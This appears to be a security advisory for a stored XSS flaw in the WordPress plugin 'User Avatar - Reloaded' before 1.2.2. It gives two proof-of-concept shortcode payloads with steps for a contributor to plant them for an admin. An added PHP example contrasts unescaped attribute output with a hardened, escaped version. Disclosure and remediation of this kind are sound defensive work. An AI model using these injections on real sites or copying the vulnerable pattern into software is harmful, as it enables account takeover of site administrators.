wpexploit | Dmitrii Ignatyev | WPEX-ID:273A95BF-39FE-4BA7-BC14-9527ACFD9F42
Sep 25, 2023 - 12:00 a.m.

User Avatar - Reloaded < 1.2.2 - Contributor+ Stored XSS

Tags: contributor+, stored xss, shortcode injection, admin reviewed, payload delivery

EPSS: 0.0004 (Low); Percentile: 14.0%

Description

The plugin does not properly sanitize and escape some of its shortcode attributes, which could allow relatively low-privileged users such as contributors to conduct Stored XSS attacks.

As a Contributor+, create a new post and add one of the following shortcodes:

[avatar user="admin" size="96" align="left" link='" onmouseover="alert(/XSS/)"' /]

[avatar user="admin" size="96" align="left" link="/" target='" onmouseover="alert(/XSS/)"' /]

Save it to be reviewed.
When an admin reviews the post and moves the mouse over the added code, the payload will be delivered.
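
The coding pattern behind this class of bug, next to a hardened form, as an added example that is not the plugin's source code. The function names and the markup are hypothetical, and `htmlspecialchars()` stands in for WordPress's `esc_attr()` so the script runs under plain PHP CLI (7.4+); the two test inputs are the attribute values from the shortcodes above.

```php
<?php
// Added illustration; NOT the plugin's source. Function names and markup are hypothetical.
// htmlspecialchars() stands in for WordPress esc_attr() so this runs without WordPress.

// Vulnerable pattern: shortcode attributes concatenated into markup unescaped.
function render_avatar_vulnerable(array $atts): string {
    $a = array_merge(['link' => '', 'target' => '', 'size' => '96'], $atts);
    return '<a href="' . $a['link'] . '" target="' . $a['target'] . '">'
         . '<img width="' . $a['size'] . '" src="/avatar.png" alt=""></a>';
}

// Hardened pattern: validate each attribute against what it may contain,
// then escape for the HTML attribute context on output.
function render_avatar_hardened(array $atts): string {
    $a = array_merge(['link' => '', 'target' => '', 'size' => '96'], $atts);
    $esc = fn(string $v): string => htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // link: must start with "/" or http(s):// (in WordPress: esc_url()).
    $link = preg_match('#^(https?://|/)#i', $a['link']) ? $a['link'] : '';
    // target: fixed allowlist of browsing-context keywords.
    $target = in_array($a['target'], ['_blank', '_self', '_parent', '_top'], true) ? $a['target'] : '';
    // size: integer clamp (in WordPress: absint()).
    $size = max(1, min(512, (int) $a['size']));

    $html = '<a href="' . $esc($link) . '"';
    if ($target !== '') {
        $html .= ' target="' . $esc($target) . '"';
    }
    return $html . '><img width="' . $size . '" src="/avatar.png" alt=""></a>';
}

// The two attribute sets from the shortcodes on this page.
$cases = [
    ['link' => '" onmouseover="alert(/XSS/)"'],
    ['link' => '/', 'target' => '" onmouseover="alert(/XSS/)"'],
];
foreach ($cases as $atts) {
    echo 'vulnerable: ', render_avatar_vulnerable($atts), PHP_EOL;
    echo 'hardened:   ', render_avatar_hardened($atts), PHP_EOL;
}
```

In the vulnerable output the double quote inside the attribute value closes `href` or `target` early, so the rest of the value is parsed as a new event-handler attribute; in the hardened output neither value reaches the markup.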
